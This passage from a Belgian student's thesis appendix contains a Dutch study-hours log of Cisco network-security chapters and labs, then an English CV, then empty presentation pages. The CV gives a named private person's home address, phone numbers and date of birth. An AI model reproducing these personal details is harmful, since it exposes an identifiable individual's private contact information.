Examen chapter1 : Implementing Network Security Thuis 26/nov 11.10 u. 11.40 u. 0.30 u. 30.10 u.

Maken van labo: Chapter 5 lab A: Configuring IPS using CLI and CLI

School 27/nov 16.00 u. 18.00 u. 2.00 u. 32.10 u.

Maken van labo: Chapter 5 lab A: Configuring IPS using CLI and CLI

School 28/nov 18.00 u. 19.15 u. 1.15 u. 33.25 u.

Maken van labo: Chapter 6 lab A: Securing layer 2 switches

School 3/dec 15.00 u. 18.00 u. 3.00 u. 36.25 u.

Maken van labo: Chapter 7 lab A: Exploring encryption methods

School 4/dec 12.00 u. 13.00 u. 1.00 u. 37.25 u.

Maken van labo: Chapter 8 lab A: Configuring Site-to-site VPN using Cisco IOS

School 4/dec 14.00 u. 16.00 u. 2.00 u. 39.25 u.

Maken van labo: Chapter 8 lab B: Configuring Remote Access VPN Server and Client

School 4/dec 16.00 u. 18.30 u. 2.30 u. 41.55 u.

Maken van labo: Chatper 8 lab C: Configuring a Remote Accesss VPN Server and Client

School 5/dec 10.00 u. 13.00 u. 3.00 u. 44.55 u.

Configureren van Access Point 1200 en Security instellen

School 5/dec 14.30 u. 17.30 u. 3.00 u. 47.55 u.

Page 146: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

146

Maken van labo: Chapter 10 lab A: Confguring ASA Basic Settings and Firewall using CLI

School 5/dec 17.30 u. 18.00 u. 0.30 u. 48.25 u.

Maken van labo: Chapter 10 lab A: Confguring ASA Basic Settings and Firewall using CLI

School 6/dec 10.00 u. 12.30 u. 2.30 u. 50.55 u.

Maken van labo: Chapter 10 lab B: Configuring ASA Basic Settings and Firewall Using ASDM

Schol 6/dec 13.20 u. 14.40 u. 1.20 u. 52.15 u.

Maken van labo: Chapter 10 lab B: Configuring ASA Basic Settings and Firewall Using ASDM

School 6/dec 15.40 u. 17.15 u. 1.35 u. 53.50 u.

Leren van hoofdstuk 1: Networking Security Consepts

Thuis 7/dec 11.10 u. 12.00 u. 0.50 u. 54.40 u.

Leren van hoofdstuk 2: Understanding Security Policies Using a Lifecyce Approach

Thuis 7/dec 14.00 u. 14.50 u. 0.50 u. 55.30 u.

Leren van hoofdstuk 3: Building a Security Strategy Thuis 7/dec 15.00 u. 16.10 u. 1.10 u. 56.40 u.

Leren van hoofdstuk 4: Network Foundation Protection

Thuis 7/dec 16.15 u. 17.30 u. 1.15 u. 57.55 u.

Leren van hoofdstuk 5: Using Cisco Configuration Professional to Protect the Network Infrastucture

Thuis 8/dec 17.00 u. 17.30 u. 0.30 u. 58.25 u.

Leren van hoofdstuk 5: Using Cisco Configuration Professional to Protect the Network Infrastucture

Thuis 9/dec 11.15 u. 11.40 u. 0.25 u. 58.50 u.

Maken van labo: Chapter 10 lab C: Configuring Clientless and ANyConnect Remote Access SSL VPN's Using ASDM

School 9/dec 14.30 u. 17.10 u. 2.40 u. 61.30 u.

Maken van labo: Chapter 10 lab D: Configuring a Site-to-Site Ipsec VPN Using CCP and ASDM

School 9/dec 17.15 u. 18.00 u. 0.45 u. 62.15 u.

Maken van labo: Chatper 2 Securing the Router for Administratice Access

School 9/dec 18.00 u. 19.20 u. 1.20 u. 63.35 u.

Leren van hoofdstuk 5: Using Cisco Configuration Professional to Protect the Network Infrastucture

Thuis 9/dec 21.10 u. 21.35 u. 0.25 u. 64.00 u.

Page 147: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

147

Leren van hoofdstuk 6: Securing the Management Plane on Cisco IOS Devices

Thuis 9/dec 22.00 u. 23.10 u. 1.10 u. 65.10 u.

Leren van hoofdstuk 6: Securing the Management Plane on Cisco IOS Devices

Thuis 10/dec 9.10 u. 9.30 u. 0.20 u. 65.30 u.

Leren van hoofdstuk 7: Implementing AAA Using IOS and the ACS Server

Thuis 10/dec 10.00 u. 11.30 u. 1.30 u. 67.00 u.

Examen chapter 2: Implementing Network Security Thuis 10/dec 12.00 u. 12.30 u. 0.30 u. 67.30 u.

Examen chapter 3: Implementing Network Security Thuis 10/dec 13.15 u. 13.45 u. 0.30 u. 68.00 u.

Leren van hoofdstuk 8: Securing Layer 2 Technologies

Thuis 10/dec 14.00 u. 15.00 u. 1.00 u. 69.00 u.

Leren van hoofdstuk 8: Securing Layer 2 Technologies

Thuis 10/dec 16.00 u. 16.45 u. 0.45 u. 69.45 u.

Leren van hoofdstuk 9: Securing the Data Plane in IPv6

Trein 11/dec 8.00 u. 8.40 u. 0.40 u. 70.25 u.

Leren van hoofdstuk 9: Securing the Data Plane in IPv6

Thuis 11/dec 12.00 u. 13.00 u. 1.00 u. 71.25 u.

Leren van hoofdstuk 10: Planning a Threat Control Strategy

Thuis 11/dec 15.00 u. 16.15 u. 1.15 u. 72.40 u.

Leren van hoofdstuk 11: Using Access Control Lists for Threat Mititgation

Thuis 11/dec 16.30 u. 18.00 u. 1.30 u. 74.10 u.

Leren van hoofdstuk 12: Understanding Firewall Fundamentals

Thuis 11/dec 19.50 u. 20.30 u. 0.40 u. 74.50 u.

Leren van hoofdstuk 12: Understanding Firewall Fundamentals

School 12/dec 10.50 u. 11.20 u. 0.30 u. 75.20 u.

Leren van hoofdstuk 12: Understanding Firewall Fundamentals

School 12/dec 14.00 u. 16.00 u. 2.00 u. 77.20 u.

Page 148: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

148

Leren van hoofdstuk 12: Understanding Firewall Fundamentals

Thuis 12/dec 19.50 u. 20.30 u. 0.40 u. 78.00 u.

Leren van hoofdstuk 13: Implementing Cisco IOS Zone-Based Firewalls

Thuis 12/dec 20.30 u. 21.30 u. 1.00 u. 79.00 u.

Leren van hoofdstuk 13: Implementing Cisco IOS Zone-Based Firewalls

Thuis 13/dec 11.30 u. 12.10 u. 0.40 u. 79.40 u.

Leren van hoofdstuk 14: Configuring Basic Firewall Policies on Cisco ASA

Thuis 13/dec 13.50 u. 14.30 u. 0.40 u. 80.20 u.

Leren van hoofdstuk 14: Configuring Basic Firewall Policies on Cisco ASA

Bus 14/dec 12.10 u. 13.00 u. 0.50 u. 81.10 u.

Leren van hoofdstuk 14: Configuring Basic Firewall Policies on Cisco ASA

Thuis 15/dec 11.00 u. 11.30 u. 0.30 u. 81.40 u.

Leren van hoofdstuk 15: Cisco IPS/IDS Fundamentals

Thuis 15/dec 14.10 u. 15.20 u. 1.10 u. 82.50 u.

Leren van hoofdstuk 15: Cisco IPS/IDS Fundamentals

Trein 16/dec 12.00 u. 12.30 u. 0.30 u. 83.20 u.

Leren van hoofdstuk 16: Implementing IOS-Based IPS

Trein 16/dec 12.30 u. 12.40 u. 0.10 u. 83.30 u.

Leren van hoofdstuk 16: Implementing IOS-Based IPS

Thuis 16/dec 13.00 u. 14.00 u. 1.00 u. 84.30 u.

Leren van hoofdstuk 17: Fundamentals of VPN Technology

Thuis 16/dec 14.10 u. 14.30 u. 0.20 u. 84.50 u.

Leren van hoofdstuk 17: Fundamentals of VPN Technology

Thuis 16/dec 15.10 u. 16.00 u. 0.50 u. 85.40 u.

Leren van hoofdstuk 17: Fundamentals of VPN Technology

Thuis 16/dec 17.00 u. 18.10 u. 1.10 u. 86.50 u.

Leren van hoofdstuk 18: Fundamentals of the Public Key Infrastructure

Thuis 17/dec 10.00 u. 10.30 u. 0.30 u. 87.20 u.

Page 149: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

149

Leren van hoofdstuk 18: Fundamentals of the Public Key Infrastructure

Thuis 17/dec 11.00 u. 12.10 u. 1.10 u. 88.30 u.

Leren van hoofdstuk 18: Fundamentals of the Public Key Infrastructure

Thuis 17/dec 14.20 u. 15.10 u. 0.50 u. 89.20 u.

Leren van hoofdstuk 19: Fundamentals of IP Security

Thuis 17/dec 16.00 u. 16.20 u. 0.20 u. 89.40 u.

Leren van hoofdstuk 19: Fundamentals of IP Security

Thuis 17/dec 16.30 u. 17.00 u. 0.30 u. 90.10 u.

Leren van hoofdstuk 20: Implementing IPSec Site-to-Site VPN's

Thuis 17/dec 17.20 u. 18.30 u. 1.10 u. 91.20 u.

Leren van hoofdstuk 20: Implementing IPSec Site-to-Site VPN's

Thuis 17/dec 19.10 u. 20.30 u. 1.20 u. 92.40 u.

Leren van hoofdstuk 21: Implementing SSL VPNs Using Cisco ASA

Thuis 18/dec 9.10 u. 10.20 u. 1.10 u. 93.50 u.

Leren van hoofdstuk 21: Implementing SSL VPNs Using Cisco ASA

Thuis 18/dec 10.30 u. 11.10 u. 0.40 u. 94.30 u.

Totaal aantal gespendeerde uren 94.30 u.

Page 150: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

150

Curriculum Vitae Nathan Boone

Name: Nathan Boone

Address: Moensberg 93

Place of residence: 1180 UKKEL

Country: Belgium

Tel. / cellphone: 023 75 04 85, 0479 76 29 77

E-mail: [email protected]

Date of Birth: 25/12/1993

Driver license: B

EDUCATION

Bachelor of Applied Informatics: Degree to be obtained in June 2014

Currently in my 3th Bachelor Year at University College Brussels

Main modules studied so far

Computer networks:

Courses o Cisco course: Networking for Home and Small Businesses o Cisco course: Working at a Small-to-Medium Business o Cisco course: Introducing Routing and Switching in the Enterprise o Cisco course: Designing and Supporting Computer Networks o Cisco course: Network Security

Used software o Cisco Packet Tracer: Network simulation tool o Wireshark: Network analyzing tool o

Computer infrastructure:

Linux o Created a server park o Passion working with Debian and Linux mint o Linux Scripting

Windows o Windows Server 2008 R2 o PowerShell Scripting

Page 151: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

151

Databases

Microsoft o Transact SQL o SQL Server Management Studio

Oracle o Oracle SQL o Oracle Apex

Software Design

Languages o C# o HTML o CSS o JavaScript

Used Software o Microsoft Visual Studio 2012: Programing tool o Aptana Studio: Web development tool

LANGUAGE SKILLS

Speaking Writing Listening

Dutch Native Speaker Native Speaker Native Speaker

English Excellent Excellent Excellent

French Good Good Excellent

German Fair Fair Fair

RELATED BUSINESS SUBJECTS

Microsoft software

Microsoft Word

Microsoft Publisher

Microsoft PowerPoint

Microsoft Excel

Microsoft Access

Microsoft Visio

Page 152: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

152

EXTRACURRICULAR ACTIVITIES

French communication skills: I worked as a monitor for young children at various playgrounds 2009-2010-2011-2012). I improved my French communication skills and also learned the importance of team skills.

Entrepreneurial skills: I boosted my entrepreneurial skills as together with friends I founded a learning company in 2010. We created and managed a learning company as a project. We actually we imported and sold champagne to local companies and individuals.

In the summer of 2013, I worked in the company Elco, a multinational in heating solutions. I learned about the structure of a multination corporation.

Sports: tennis and football. Again this helps to work in a team, to persevere and to be ambitious.

Page 153: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

153

De presentatie

Page 154: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

154

Page 155: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

155

Page 156: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

156

Page 157: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

157

Page 158: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

158

Page 159: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

159

Page 160: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

160

Page 161: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

161

Page 162: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

162

Page 163: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

163

Page 164: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

164